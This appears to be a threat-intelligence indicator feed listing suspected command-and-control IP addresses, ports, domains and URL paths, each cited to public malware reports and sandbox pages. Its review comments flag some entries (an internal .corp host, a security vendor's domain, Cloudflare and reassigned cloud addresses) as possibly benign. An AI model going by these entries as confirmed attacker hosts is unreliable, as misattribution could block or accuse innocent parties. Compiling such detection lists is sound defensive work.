# Reference: https://twitter.com/TheDFIRReport/status/1407322479664762890

207.154.205.192:443

# Reference: https://twitter.com/ScumBots/status/1413488183971663873
# Reference: https://www.virustotal.com/gui/file/bd292dd957afeb361a60e90239d84e03664a3d972934635ca7f5bd73a330cc01/detection

3.13.191.225:15328

# Reference: https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
# NOTE(review): a few entries further down this list deserve a second look before alerting
# or blocking on them:
#   - chgvaswks045.efgz.efg.corp is under .corp, which is not a delegated public TLD, so it
#     reads as an internal hostname;
#   - megalon.trustwave.com sits under a security vendor's domain;
#   - http://11.79.40.53 is in 11.0.0.0/8, presumably reused as internal addressing in the
#     sample — confirm.
# These may reflect internal or authorised-testing hosts rather than attacker-controlled
# infrastructure — verify against the referenced write-up.

103.238.227.201:7788
104.131.154.119:8080
104.131.182.177:443
104.145.225.3:8081
104.233.102.23:8080
107.170.132.24:443
108.61.211.36:443
108.61.217.22:443
137.117.188.120:443
138.121.170.12:3031
138.121.170.12:3133
138.121.170.12:3135
138.121.170.12:3136
138.121.170.12:3137
138.121.170.12:3138
138.121.170.12:500
14.144.144.66:8081
145.131.7.190:8080
146.148.58.157:8088
149.56.178.124:8080
159.203.18.172:8080
163.172.175.132:8089
185.117.72.45:8080
187.177.151.80:12345
187.228.46.144:8888
188.68.59.11:8081
191.101.31.118:8081
192.241.129.69:443
197.85.191.186:443
205.232.71.92:443
212.99.114.202:443
23.239.12.15:8080
24.111.1.135:22
41.230.232.65:5552
45.63.109.205:8443
46.101.185.146:8080
46.101.203.156:443
46.101.90.248:443
46.246.87.205:443
50.251.57.67:8080
50.3.74.72:8080
52.28.242.165:8080
52.28.250.99:8080
52.36.245.145:8080
52.39.227.108:443
52.86.125.177:443
64.137.176.174:12345
66.11.115.25:8080
66.192.70.39:443
66.60.224.82:443
68.66.9.76:443
69.20.66.229:9443
84.14.146.74:443
84.200.2.13:8080
84.200.84.185:443
93.176.84.34:443
93.176.84.45:443
http://104.130.51.215
http://11.79.40.53
http://139.59.12.202
http://159.203.89.248
http://163.172.151.90
http://166.78.124.106
http://197.85.191.186
http://222.230.139.166
http://23.116.90.9
http://47.88.17.109
http://52.19.131.17
http://52.196.119.113
http://66.192.70.38
http://78.229.133.134
http://93.187.43.200
http://95.211.139.88
http://98.103.103.168
http://98.103.103.170
192.ho4x.com
ahyses.ddns.net
amazonsdeliveries.com
chgvaswks045.efgz.efg.corp
ciagov.gotdns.ch
dsecti0n.gotdns.ch
enterprizehost.com
host-101.ipsec.io
jdirving.email
kernel32.ddns.net
kooks.ddns.net
logexpert.eu
megalon.trustwave.com
metrowifi.no-ip.org
microsoft-invites.com
microsoft-update7.myvnc.com
mygoogle-analytics.com
pie32.mooo.com
polygon.1dn0.xyz
remote-01.web-access.us
rzepka.se
securetx.ddns.net
sixeight.av-update.com
sparta34.no-ip.biz
sukem.zapto.org
vanesa.ddns.net
wellsfargolegal.com

# Reference: https://twitter.com/TheDFIRReport/status/1423331717117579268
# Reference: https://beta.shodan.io/host/45.32.206.130

http://45.32.206.130
45.32.206.130:22
45.32.206.130:443

# Reference: https://twitter.com/TheDFIRReport/status/1423331717117579268
# Reference: https://beta.shodan.io/host/46.101.104.95

46.101.104.95:443
46.101.104.95:8000
46.101.104.95:8443
46.101.104.95:9100

# Reference: https://twitter.com/ScumBots/status/1423468949774217219
# Reference: https://www.virustotal.com/gui/file/5dc6dfbc8044deb6a3745a29fa4e285f62f91fe2a73ca247272bfd539b75f128/detection

192.100.0.17:4444

# Reference: https://twitter.com/ScumBots/status/1438826396491595777
# Reference: https://www.virustotal.com/gui/file/dbc4e318ce40d4ebfda9f59438f8c13a1ac6f89c5e6ecf6acfebe818c1641676

130.193.41.58:443

# Reference: https://twitter.com/ScumBots/status/1457362285861736453
# Reference: https://www.virustotal.com/gui/file/ea6cbb61f0589f139f4a79652e820329b02a5017e2a3703e8e35e33c012c13f4/detection

18.194.132.191:443

# Reference: https://twitter.com/ScumBots/status/1462040606872592395
# Reference: https://www.virustotal.com/gui/file/c92a7f657301e496610ae9ff85e01fe8e60f1179cae6e062bfcfd191a4c0e30d

23.88.123.250:4444

# Reference: https://www.virustotal.com/gui/file/27a220a96badc097884262c8a9358aa84e41b322556e08d30b1eb9bd1b78f167/detection

185.146.232.30:1337

# Reference: https://twitter.com/TheDFIRReport/status/1467860126077911043

138.197.167.41:443

# Reference: https://www.virustotal.com/gui/file/2e92e5f45d575d43a0a1d21654e0691b6ea7b45da9761482095005b6611d8419/detection

115.186.187.80:1234

# Reference: https://www.virustotal.com/gui/file/a6ef8216979b8b7f8f033bbcba91b4cba9a8cead9c4553e0855cd51956f61efd/detection
# Reference: https://www.virustotal.com/gui/file/ed77c28f2115e221d32e032db915ddd4247b665aa28e9f391f96b1730a41a861/detection

45.146.164.160:4321

# Reference: https://www.virustotal.com/gui/file/4c2574de9f72209ee2e1e7fe23830746850170869af411bef2111c4097d5f8da/detection

24.135.12.28:8080

# Reference: https://www.virustotal.com/gui/file/9a1c09403bd04ba1af32df5ba156671814193bd9518129dfa14f707eae785378/detection

51.178.75.43:41200

# Reference: https://www.virustotal.com/gui/ip-address/185.112.146.165/relations
# Reference: https://www.virustotal.com/gui/file/c8f710f0a9c18d38a7ecf4ca6a9d28219c32037a643a1d45989831c0ec975048/detection
# Reference: https://www.virustotal.com/gui/file/c9d281b901ce339495a0c2984e79ceaaa8a769c79bd27d211026cba030e9f794/detection
# Reference: https://www.virustotal.com/gui/file/d2cdc57f4bde1e89d65db8201f240e626022e08df5be3f8fa585848c1119530a/detection
# Reference: https://www.virustotal.com/gui/file/21c14dfb477a1c4e005c56d1676aa5a90f9e08e1b0c07c486fb55f21e75e2621/detection
# Reference: https://www.virustotal.com/gui/file/b544e5581dbdca825eb07a15fa3bc7c208577e8489b620f479f96a792241efb3/detection
# Reference: https://www.virustotal.com/gui/file/4fdec157e4343619c671e3d722bf75baafe24a65cc60a45603eb720f1a503999/detection
# Reference: https://www.virustotal.com/gui/file/e93ea9ebfb97c8fdfe00ce405a14d661581c494c648827cdea6ba89089284df4/detection

185.112.146.165:4446
185.112.146.165:45000
185.112.146.165:8080
185.112.146.165:8081
54.38.220.85:123
badmildiou.com
nidhoggr.club
treefighter.org

# Reference: https://threatfox.abuse.ch/browse/tag/log4j/

185.254.196.122:4445

# Reference: https://twitter.com/ankit_anubhav/status/1471079526658560003
# Reference: https://tria.ge/211215-njvt8sadaq/behavioral1

62.182.158.156:6666
62.182.158.156:8888

# Reference: https://www.virustotal.com/gui/file/20ad997410c4e5ac78ad3ecaf76bf3595aacda71e899a0bd2ef90917afd69ff0/detection

13.58.157.220:17525
3.142.129.56:17525
3.142.167.4:17525
3.142.167.54:17525
3.142.81.166:17525
3.19.130.43:17525

# Reference: https://www.virustotal.com/gui/file/0156ca6f8fb12a2415de4c896f346caab9f342ccd597912b88e890805fcd1e3d/detection

3.129.187.220:14020
3.131.147.49:14020
3.133.207.110:14020
3.136.65.236:14020
3.138.180.119:14020
3.22.15.135:14020

# Reference: https://twitter.com/petrovic082/status/1467822724932321288
# Reference: https://app.any.run/tasks/d367b18c-69e6-4026-b84a-4f8d52098687/
# Reference: https://www.virustotal.com/gui/file/bb627db44f44c8b23220602f5ae6bc2fa34b89d612ab3118f815fca43cfcf331/detection

v3-fastupload.s3-accelerate.amazonaws.com

# Reference: https://twitter.com/r3dbU7z/status/1468119168096612357
# Reference: https://www.virustotal.com/gui/file/fafbf0870568dae2e02913cbe158011c867098bda883c8f85a13d1f83a4aa937/detection

208.88.226.158:443

# Reference: https://twitter.com/drb_ra/status/1476180260953726978

emailservices.events

# Reference: https://twitter.com/drb_ra/status/1476758694729764890

188.166.171.154:443

# Reference: https://twitter.com/TheDFIRReport/status/1461733507324162056

13.90.131.107:443

# Reference: https://www.virustotal.com/gui/file/4a61696932f036bd2f57482516fd5d8b7e2939259757f82d17ed27f6fe430794/detection

3.14.182.203:12417

# Reference: https://www.virustotal.com/gui/file/2d1f1b961df03d0f572f072aae89e6c2f9e947d87551df85781d781cbf5a3918/detection

45.142.212.161:8881

# Reference: https://www.virustotal.com/gui/file/bd7745a252f92a9a8ef0e0469d113c354dde8547e1cbc9a865080cfa48eda9c8/detection

boyte.sytes.net

# Reference: https://twitter.com/ffforward/status/1479416818829860866

/katalogpwsh/

# Reference: https://www.virustotal.com/gui/file/64dcd0626a335c212083a51ffffc37950fcd5dfea73b8e6a5d8c92d6abfd8e71/detection

119.45.102.166:4445

# Reference: https://www.virustotal.com/gui/file/bc3beb2ce29d965c215baf97c54cb321d7f579a7a6fe6a4992e4f1f5d8d51808/detection

194.5.98.253:5900
joelthomas.linkpc.net

# Reference: https://www.virustotal.com/gui/file/27db881cc60237f6c967fd8475115a64dec4b9246908e2a940382dad66bb31d7/detection

167.172.61.60:443

# Reference: https://www.virustotal.com/gui/file/e67a7ce47865a9324cf1419c71204a15fb24dc875a0a51451bf71d29d7c41fd3/detection

167.172.61.60:444

# Reference: https://twitter.com/JAMESWT_MHT/status/1488152643230965760
# Reference: https://www.virustotal.com/gui/file/9786fa48e5307616b67727ae75b1b08393b71ad9c088c6277a598638d1bb5a15/detection

imagingworld.in/factur.docx
imagingworld.in/report.pdf
pinkstravels.com/locals.php

# Reference: https://www.virustotal.com/gui/file/512cd7d8f32c1da7b949871b47cee24c454e58585b6ea151c66789fd4a065c78/detection

yugnuvurka.temp.swtest.ru

# Reference: https://www.virustotal.com/gui/file/29e7cf9579480cc3787c3e33add6e99611611c448eea2c7cf67e789d64d397ff/detection

zospayilmu.temp.swtest.ru

# Reference: https://www.virustotal.com/gui/file/034927ea9d5aa9bb0a88a364af4d9733f5b9b933aa7ecd45b6aa9e1cc221c6ca/detection

http://5.181.80.213

# Reference: https://twitter.com/malwrhunterteam/status/1489520707809779715
# Reference: https://www.virustotal.com/gui/file/d7ba3b1d6fe9230a53606857508d0e79682e71fbd9200e70360700d831d8fef3/detection

coolfreecv.com:443/doc/coolfreecv_resume_en_06_n.docx

# Reference: https://www.virustotal.com/gui/file/1038e0df36ff80507942b6ac24f5bfda0d23416a5385c8c645ff0a8cf4f66acf/detection

http://198.50.177.251

# Reference: https://twitter.com/ScumBots/status/1492247150251720707
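# Reference: https://www.virustotal.com/gui/file/f51e500a628692adcc6aec55c3277675c8bbcb842fabfb61dab7408e2dd2968d/detection
# Note (review): many cloud-hosted addresses sharing one port for a single sample presumably indicates a shared tunnelling or forwarding front end rather than attacker-owned hosts (verify against the references); such addresses are reassigned over time, so check the sighting date before treating a match as confirmed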

18.188.14.65:18033
18.216.53.253:18033
18.223.41.243:18033
18.224.144.66:18033
198.58.98.92:18033
3.13.191.225:18033
3.134.125.175:18033
3.134.196.116:18033
3.134.39.220:18033
3.135.90.78:18033
3.137.63.131:18033
3.14.182.203:18033
3.14.212.173:18033
3.17.117.250:18033
3.17.202.129:18033
3.17.7.232:18033
3.19.114.185:18033
3.19.3.150:18033
3.20.98.123:18033
3.22.30.40:18033
45.79.7.70:18033
45.79.9.205:18033
52.14.61.47:18033
52.15.183.149:18033
52.15.194.28:18033
52.15.62.13:18033
52.15.72.79:18033

# Reference: https://www.virustotal.com/gui/file/3dfe6b6f02b05498e07f164ca29545631cbc909a1c1000a4e40113407cde1d03/detection

http://45.64.112.51

# Reference: https://twitter.com/jaydinbas/status/1493202636866261000
# Reference: https://www.virustotal.com/gui/file/4db544c4ff262ba2f01b23cf9d6c3af23cae203efb7e06d7960ad06ada564f2b/detection
# Reference: https://www.virustotal.com/gui/file/944a8fac13b495f11628696c04673115c90ee650fc8ff3e440335e6d73df2496/detection
# Reference: https://www.virustotal.com/gui/file/de62e54976010eebd7a764e7ad5029a23b26256308f713229f724abb4f4be05c/detection

inexa-group.com
paste.inexa-group.com

# Reference: https://twitter.com/jaydinbas/status/1489241835927216128
# Reference: https://www.virustotal.com/gui/file/c23e61db0e74e6d48ba27f17461abc88c700e0a386ffdbd4c1a1571ebf630d4f/detection

i-development.one

# Reference: https://www.virustotal.com/gui/file/922f078a109aa494d631a81d67e6b9db994af58db023fa9c69576c96e2616ae3/detection

hdoc.duckdns.org

# Reference: https://twitter.com/1ZRR4H/status/1496748012256866308

101.35.121.232:8000

# Reference: https://www.virustotal.com/gui/file/a0e90b286000cff6bc9236c1d49763b19b554b8cd5cd7549907c8de88e372240/detection
# Reference: https://www.virustotal.com/gui/file/985f7026e7e8482e4c7e0fd87390b99aa9d00888774189cbf6828fb4553dbb80/detection

42.193.39.49:8080

# Reference: https://twitter.com/Max_Mal_/status/1500447223217278980
# Reference: https://www.virustotal.com/gui/file/fb7970ac7563dedda8cf507d7dabcfbe15f32bd91c4499420a50cd318d5ec439/detection

http://103.142.218.18

# Reference: https://www.virustotal.com/gui/file/f5a4a5e62200a8409389072b0b9e3af7760b9d83f479cdc25b100319bbe2b2e8/detection

http://157.245.250.76

# Reference: https://twitter.com/ScumBots/status/1501868046822031361
# Reference: https://www.virustotal.com/gui/file/c24bbc9e4f16081e64d94b6104890b37b4492e14ea62cfc7844f511ede25e081/detection

149.28.148.219:8445

# Reference: https://twitter.com/ScumBots/status/1502341161393999872
# Reference: https://www.virustotal.com/gui/file/0012303bbcfa1d83fc655c54c28ffe2cd041504f1ab8ae704dc0614f2b2a07ba/detection

85.214.237.196:443

# Reference: https://www.virustotal.com/gui/file/449888a9bd8efbfe0f9c15965882d3ea50fec4a124bc7fd603ac16956289a16c/detection

154.16.167.72:1006

# Reference: https://www.virustotal.com/gui/file/938300c70c7ee66a45b6e747f068a1d08e6191a6fbd17d73d6ea2ee673da9f0f/detection

124.222.220.31:4444

# Reference: https://twitter.com/drb_ra/status/1504978479309332480

18.135.28.6:443

# Reference: https://twitter.com/drb_ra/status/1507194659285745665

tunnistautuminen.quest

# Reference: https://twitter.com/drb_ra/status/1507152832264298496

red-ops.team
/qqzddddd/2018/load.php

# Reference: https://twitter.com/drb_ra/status/1507877703017508868

18.116.32.198:443

# Reference: https://twitter.com/drb_ra/status/1507917437899055106

149.167.94.36:443

# Reference: https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/
# Reference: https://www.virustotal.com/gui/file/77e0d3366f7516cb2661a48c252fee7a1bc0abfe598feae40cf4e1c918fe97ee/detection
# Reference: https://www.virustotal.com/gui/file/9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0/detection
# Reference: https://www.virustotal.com/gui/file/c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28/detection

swordoke.com

# Reference: https://twitter.com/drb_ra/status/1509195039095803918

193.36.15.251:443

# Reference: https://www.virustotal.com/gui/file/51973e690c8790f7270b2e1e99383a81bac1f01bc5f46dab9341834513721ef6/detection

3.141.142.211:12356

# Reference: https://twitter.com/drb_ra/status/1510064550632169479

androidenews.com

# Reference: https://twitter.com/drb_ra/status/1510609246534180873

http://142.93.233.148

# Reference: https://www.virustotal.com/gui/file/2b15cb9ae88ee3aa9a9fe8a27479a570062c8c31e0b28f264f0223412221fb93/detection

95.216.221.82:4444

# Reference: https://twitter.com/drb_ra/status/1511371495271976965

nettitude.gzpt.org

# Reference: https://twitter.com/drb_ra/status/1511501477793222665

daq09367inkax.cloudfront.net

# Reference: https://twitter.com/ScumBots/status/1512096689422839815
# Reference: https://www.virustotal.com/gui/file/472e4f80a21736d734de6735d6686d4526d76ff68c3ffc5880d0e44580b1b0ba/detection

46.4.114.111:9999

# Reference: https://twitter.com/drb_ra/status/1512998349426896897

143.198.71.104:443

# Reference: https://twitter.com/drb_ra/status/1512999086638735365

appsteams.com

# Reference: https://twitter.com/drb_ra/status/1513690881408348166

office.thebrain.net

# Reference: https://twitter.com/drb_ra/status/1514041527814823947

45.56.113.131:443

# Reference: https://twitter.com/drb_ra/status/1514449947650924546

ye-cert.com

# Reference: https://www.virustotal.com/gui/file/0008e122dff45c48ab93361085280cca8c0f8f0f35f742ea73a772f03dde1f41/detection

seryanjek.com

# Reference: https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
# Reference: https://otx.alienvault.com/pulse/6135d2c0c031eac2759657d6

135.181.10.218:443

# Reference: https://twitter.com/drb_ra/status/1516937383090044930

34.235.5.141:443

# Reference: https://twitter.com/drb_ra/status/1516940210776547328

54.37.225.27:443

# Reference: https://twitter.com/drb_ra/status/1516940512422506496

classcharts.uk

# Reference: https://twitter.com/drb_ra/status/1518577537651200000

109.228.40.199:443

# Reference: https://twitter.com/osipov_ar/status/1518654392777510916

http://138.124.184.220

# Reference: https://twitter.com/drb_ra/status/1519839795471659008

52.185.188.46:443

# Reference: https://twitter.com/drb_ra/status/1520199027547062274

18.208.248.51:443

# Reference: https://twitter.com/drb_ra/status/1520226667624648706

pankki.store

# Reference: https://twitter.com/ScumBots/status/1520700888112930817
# Reference: https://www.virustotal.com/gui/file/5b386d361997ea2108141a8c22ae8f6bb3835a8e23ef25dd72b9438674dc595c/detection

106.10.106.0:4444

# Reference: https://twitter.com/ScumBots/status/1521869837185781762
# Reference: https://www.virustotal.com/gui/file/5e0ff6e0762fefc8f7a7d214b9717c64abb8000283014965b74225fed08eeb89/detection

206.189.119.181:443

# Reference: https://twitter.com/drb_ra/status/1522757920068411399

147.182.134.175:443
174.138.110.120:443

# Reference: https://twitter.com/drb_ra/status/1522920341500219394

52.246.168.227:443

# Reference: https://twitter.com/drb_ra/status/1525299882256375808

159.65.136.204:5050

# Reference: https://twitter.com/drb_ra/status/1524547711781027841

23.163.0.59:443

# Reference: https://twitter.com/drb_ra/status/1524910249731293207

34.238.250.112:443

# Reference: https://twitter.com/drb_ra/status/1525482106171887623

159.203.28.9:443

# Reference: https://twitter.com/drb_ra/status/1525488694215458823

195.123.220.222:443

# Reference: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

collaboration-bw.de
kleinm.de

# Reference: https://twitter.com/ScumBots/status/1526215976748036102
# Reference: https://www.virustotal.com/gui/file/cb3ddfba160b1a928fc99c80e8b3f82ed620998d082793022461aef6ba2f3e0c/detection

3.126.224.214:16050

# Reference: https://twitter.com/drb_ra/status/1526926521583259649

150.136.140.174:443

# Reference: https://twitter.com/drb_ra/status/1527094517156962304

95.213.145.101:443

# Reference: https://twitter.com/drb_ra/status/1528185222709362689

docs.jcbbrokers.com

# Reference: https://twitter.com/drb_ra/status/1528375525798035458

206.189.4.169:443

# Reference: https://www.virustotal.com/gui/file/0022045c76a9880ed0dbef3db814c92529c9e5fdbc5e1b1dc0fdcc26140fb45a/detection

digitalcomparendo.com.co

# Reference: https://www.virustotal.com/gui/file/a6bca64361aaaf870b90525ffc35e2b17d2ba17b94a7bde793f0aafa02f11c54/detection

sellinruss2.com

# Reference: https://www.virustotal.com/gui/file/50538c1210a31fe8608676a6c7b061bc4b8472db053de6fa80daae7d86372e28/detection

http://54.159.59.99

# Reference: https://twitter.com/drb_ra/status/1529991314326147086

159.223.194.182:443

# Reference: https://www.virustotal.com/gui/file/cdfc5ba406b1099a15ec57cd52c916238a8a89a3e6505f47a692cba92739f455/detection

king-ccards.online

# Reference: https://twitter.com/malwrhunterteam/status/1531709311746985984
# Reference: https://www.virustotal.com/gui/file/e8f0a2f79a91587f1d961d6668792e74985624d652c7b47cc87367cb1b451adf/detection
# Reference: https://www.virustotal.com/gui/file/bf10a54348c2d448afa5d0ba5add70aaccd99506dfcf9d6cf185c0b77c14ace5/detection
# Reference: https://www.virustotal.com/gui/file/1f245b9d3247d686937f26f7c0ae36d3c853bda97abd8b95dc0dfd4568ee470b/detection

109.248.59.74:1337

# Reference: https://twitter.com/ScumBots/status/1531994048269000706
# Reference: https://www.virustotal.com/gui/file/254d9104946b1fa73c5447dcf57c6a8172401feec7d9c518eba23df90b57ca4f/detection

54.190.24.216:8080

# Reference: https://twitter.com/ScumBots/status/1532355178447388673
# Reference: https://www.virustotal.com/gui/file/6f761d9149c1ab9e1a19c77821419e3b11b60d8649ed4406c269c2b96690d0c0/detection

3.22.53.161:10221

# Reference: https://twitter.com/malwrhunterteam/status/1532443932453388288
# Reference: https://www.virustotal.com/gui/file/8d7117bc2c97e7e1a2c6417c37edc1031fb9441cbedc40ed38276d441d018d9b/detection

8866ddd7771251526d5e5e.cloudflareworkers.com

# Reference: https://twitter.com/ScumBots/status/1532933990927286272
# Reference: https://www.virustotal.com/gui/file/dd5d4da062f7b6363d3f165e76392b84ff455def8eeca2980b92f9295c364171/detection

3.6.115.182:16512

# Reference: https://www.virustotal.com/gui/file/3eb41d7351608e5ec7ae17da7bd889a6edadb3fd26080546d5093bd7fbd108bd/detection

adfj4356sjkl23jf367ld234k6fh6k86s234.jquerydb.com
resource.jquerydb.com

# Reference: https://twitter.com/drb_ra/status/1532701358586994688

13.59.166.155:443

# Reference: https://twitter.com/drb_ra/status/1532710008470884355

109.234.36.5:443

# Reference: https://twitter.com/drb_ra/status/1532882609541455873

bcxstaging.co.za
dev.bcxstaging.co.za

# Reference: https://twitter.com/drb_ra/status/1532882928316858370

daq09367inkax.cloudfront.net

# Reference: https://www.virustotal.com/gui/file/b536ba7328c4913798d2146ddceec2bf7891abef728f2c57db71b153f59a5ef3/detection

http://101.43.242.147

# Reference: https://twitter.com/drb_ra/status/1533973002232246272

54.215.206.234:443
imadeyou.click
c2.imadeyou.click

# Reference: https://twitter.com/drb_ra/status/1533983732381646848

150.136.140.174:443

# Reference: https://www.virustotal.com/gui/file/b9b479158d5dea67310c4c0c732e852de11830f3416d5eb2faf01b777fdac20f/detection

dianli.ru

# Reference: https://twitter.com/drb_ra/status/1535428913190555649

109.234.36.5:443

# Reference: https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/
# Reference: https://otx.alienvault.com/pulse/62a08073756f4059e6464d77

http://167.99.57.116
http://172.104.31.117
http://18.216.140.250
http://18.221.234.103
http://191.37.248.120
http://192.99.152.200
http://193.106.191.71
http://2.56.11.65
http://27.1.1.34
http://31.13.191.157
http://54.88.149.100
http://84.17.48.94
http://87.249.135.167
http://89.187.170.129

# Reference: https://twitter.com/pmelson/status/1536819641846272008
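# Reference: https://www.virustotal.com/gui/file/1b9c291c4dca0f4af299a0ece26a7c3b3f87a0a7eb9f5b57aa7c894774c40407/detection
# Note (review): 104.16.243.78 and 104.16.244.78 are in Cloudflare-announced address space (shared CDN edge), so IP:port hits on them can come from unrelated sites; corroborate with the n00bzunit3d.xyz hostnames below before acting on a match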

104.16.243.78:8080
104.16.244.78:8080
162.255.119.65:8080
n00bzunit3d.xyz
challs.n00bzunit3d.xyz
ctf.n00bzunit3d.xyz
test.n00bzunit3d.xyz
wiki.n00bzunit3d.xyz

# Reference: https://twitter.com/malwrhunterteam/status/1537022403347460096
# Reference: https://www.virustotal.com/gui/file/a8ce2181ce6e56c147412c600a430fdb7baf68550b6f822b98a1759f52adb72f/detection

gmgeneraltrading.com

# Reference: https://twitter.com/malwrhunterteam/status/1537412988558245888
# Reference: https://www.virustotal.com/gui/file/de495346ac81d29707c92181382989cbcc9ecab3feeb7c38eb6fe4364c89cde8/detection

transacor.ma

# Reference: https://twitter.com/malwrhunterteam/status/1537424206434119680
# Reference: https://www.virustotal.com/gui/file/68462163987c2f96488ff08d44d88b6f08d5da7ecbb478bd38d4a156bb61e2b7/detection

facturamx.club

# Reference: https://twitter.com/Dkavalanche/status/1537483210409803777

http://20.240.40.118

# Reference: https://twitter.com/malwrhunterteam/status/1537521767262015488

smarthav.com

# Reference: https://twitter.com/malwrhunterteam/status/1538094207478517764
# Reference: https://www.virustotal.com/gui/file/ddbd0b917d017d5709bd4fb2e0acd4d877d829fb9bc32865550fb556eadb6739/detection

pidipurev.com

# Reference: https://www.virustotal.com/gui/file/03269a24a60591752df46b0303e61c51798333dafd9ed59513bfa620866c2358/detection

gr3.ddns.net

# Reference: https://twitter.com/drb_ra/status/1537231657119338498

20.78.19.235:443

# Reference: https://twitter.com/malwrhunterteam/status/1539333876895854592
# Reference: https://www.virustotal.com/gui/file/2c861d284d35b5d9bd79c697430c32a41759ff713269ca54aabd165505d4ede4/detection
# Reference: https://www.virustotal.com/gui/file/b38109e065c8fe5fdaf88f182597b6bff73c6578f02a757afdba7031db054913/detection
# Reference: https://www.virustotal.com/gui/file/fd3cfce2a371634763db5d184ee7b8115e48baa16177d27376a61c75092e1a32/detection
# Reference: https://www.virustotal.com/gui/file/a2514e2e9c9eb522c07ddad50c66a0c99d9ac64a7445722f94bd5fb358e45220/detection
# Reference: https://www.virustotal.com/gui/file/6e2be3ffea3e74f39145d89bd69a91162c4a436a51da3c1e1b9131c8f8764861/detection

206.84.168.139:4444
206.84.168.191:4444
206.84.168.30:4444
206.84.169.110:4444
strongvpn.ga

# Reference: https://twitter.com/drb_ra/status/1539425978438516737

192.18.141.199:443

# Reference: https://twitter.com/malwrhunterteam/status/1539621033908621314
# Reference: https://www.virustotal.com/gui/file/5270cb73da9b7ca550e1ae3ccd2e0875c7a5e49782daf2ca169d6a29d479f628/detection

http://95.217.244.204
infinite-stars.net

# Reference: https://www.virustotal.com/gui/file/c557d03fa307f13a3086053c022a8e146b1e5725995e2bf0fd2ef2d66d0ba9ea/detection

nikitarovonovich.pserver.ru

# Reference: https://twitter.com/malwrhunterteam/status/1540614846600908800

http://46.21.153.250

# Reference: https://twitter.com/ScumBots/status/1540390624788185089
# Reference: https://www.virustotal.com/gui/file/a3465a008ffa2a0946e1ebe4124f6569623940d0494a264c6329c818fdecb279/detection

3.142.129.56:1869

# Reference: https://twitter.com/ScumBots/status/1541462190745686016
# Reference: https://www.virustotal.com/gui/file/3e79efb3d76cd8ff9734ddab1e0cc2a08cf1903a6e1b6382acb7ea86a5d19660/detection

79.110.52.135:8080

# Reference: https://twitter.com/ScumBots/status/1542158527388680194
# Reference: https://www.virustotal.com/gui/file/9c4b568c60f30008f19e76a1cc16f37dbf2826c22a580f39b4f009a40f7530e7/detection

170.187.232.147:87

# Reference: https://twitter.com/malwareforme/status/1542261607035588608
# Reference: https://www.virustotal.com/gui/file/98d94759958e3b79de90e9da6a2a5d904cd3efc7c0f45773d2ac5dc4b63f1d56/detection

http://176.100.42.180

# Reference: https://www.virustotal.com/gui/file/21286ed0b3e56f49c287617ee5bf4ef687c627e342d72297008e3fce73a5ae20/detection

http://120.48.85.228

# Reference: https://twitter.com/drb_ra/status/1542850540421488640

45.14.224.96:443

# Reference: https://twitter.com/malwrhunterteam/status/1544045677482762241
# Reference: https://www.virustotal.com/gui/file/902d69ecac8da439d9e80b08b034c3bc94dca3b150bf2564752169682954ad43/detection

0c020.com

# Reference: https://twitter.com/drb_ra/status/1544122690818162689

83.229.83.41:443

# Reference: https://twitter.com/malwrhunterteam/status/1544688445154594819
# Reference: https://www.virustotal.com/gui/file/b9d958bdc2ce406d4fae5e73d19e9b3f5222a61e3fe3655ed36bb6ab83e145e7/detection

gojourneys.com/service.hta

# Reference: https://twitter.com/ScumBots/status/1545123058616307713
# Reference: https://www.virustotal.com/gui/file/924276827de0e5d6a1ffc01cb025f206159e974b71796c7b850794258daa1878/detection

payrewardapp.com
api.payrewardapp.com
imv.payrewardapp.com

# Reference: https://www.virustotal.com/gui/file/6da3fbd52970e23b106401bb82298e353f9d1db09fab7a6ad16b6a2ad0188060/detection

161.35.90.195:4444
c2server.duckdns.org

# Reference: https://twitter.com/malwrhunterteam/status/1547580496460206080
# Reference: https://twitter.com/StopMalvertisin/status/1547851359948804096

http://185.228.83.60
/alksdldoosal
/wxbTRXIuGyNqdPhzfYlJeDOUWKFC

# Reference: https://www.virustotal.com/gui/file/afa2a4fbfb46e5c2f687a741e7b8337c14a52c7bfcbe28cc27933a41dcdb8a6a/detection

Nerviusss25-51690.portmap.host

# Reference: https://twitter.com/drb_ra/status/1548662939716034562

a-banking.com
fly.a-banking.com

# Reference: https://www.virustotal.com/gui/file/c36f0d9d77e5fb8fbe251b57a6a02f7da6222bf270960a79c00422a56c8ca859/detection

45.32.160.133:9191

# Reference: https://www.virustotal.com/gui/file/f18667d39c13df2cc1cd68af0246667e9d7e614ba572120befe16e38f306b035/detection

212.192.242.16:1000

# Reference: https://www.virustotal.com/gui/file/4b445a21fa7863a844b90beebfb5bed18e2acea8f5747b32453fc31d9112963f/detection

downloadyarbot.shopyfi.ir

# Reference: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

46.229.215.108:4433
78.40.219.13:8888

# Reference: https://www.virustotal.com/gui/file/eca5efb923224e2d8fddfcba53d30b44c8c68fc6cb73bca72dc4ec424096a7ef/detection

95.111.250.149:8000

# Reference: https://www.virustotal.com/gui/file/8948fb84fbefb2c969888ab77d438cb8ac00694551dbac317b236fda66e4a739/detection

20.226.41.232:9001

# Reference: https://www.virustotal.com/gui/file/30ce8e40b79621b0555bb818b71d769d3edf6210944007c17d1f31e918fadc45/detection

106.52.42.139:6789
106.52.42.139:801

# Reference: https://twitter.com/drb_ra/status/1550280325506469890

http://45.14.224.110
/vfe01s/1/vsopts.js/

# Reference: https://www.virustotal.com/gui/file/0da30282299c1f351510bfd83463d4ba820687c027e854b1b03fd6124547d77f/detection

213.170.135.6:25561
insmp.net
uk.insmp.net

# Reference: https://www.virustotal.com/gui/file/68a4fd2b4fe913f6ec71196731f0fa3bbed17589ee18d6ec2878a8a20001f905/detection
# Reference: https://www.virustotal.com/gui/file/4d72c7d6ded3cae715ce6f362d3ec79de5f484a264bf52532df316a496ecad04/detection
# Reference: https://www.virustotal.com/gui/file/3694875ffe41f247ef6b5d6eb2d5d3f9ee4939e94735f4aec96e1fa7e3e64d78/detection

aasporo.com

